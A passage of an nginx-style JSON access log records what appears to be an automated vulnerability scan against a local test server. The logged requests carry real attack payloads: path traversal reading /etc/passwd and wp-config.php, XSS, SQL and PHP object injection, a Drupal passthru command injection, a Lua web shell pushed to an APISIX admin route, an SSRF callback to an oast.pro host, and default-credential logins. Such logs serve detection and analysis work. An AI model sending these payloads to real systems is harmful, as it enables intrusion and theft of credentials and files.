/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aqsm_remove_file_fd_question\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22file_url\x22\x0D\x0A\x0D\x0A{{fullpath}}wp-content/plugins/quiz-master-next/README.md\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.997","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(29KBxZ2tjSoKuudIkLZsHIXNYWW)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#post_render][]\x22\x0D\x0A\x0D\x0Apassthru\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#type]\x22\x0D\x0A\x0D\x0Amarkup\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#markup]\x22\x0D\x0A\x0D\x0Acat /etc/passwd\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22form_id\x22\x0D\x0A\x0D\x0Auser_register_form\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22_drupal_ajax\x22\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"127.0.0.1/user/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WCC2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://ca28bc0smpvbbtig07h0dwbypkba7s54f.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/29KBxbutHlZSAA6SSDpHyamWjMt\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 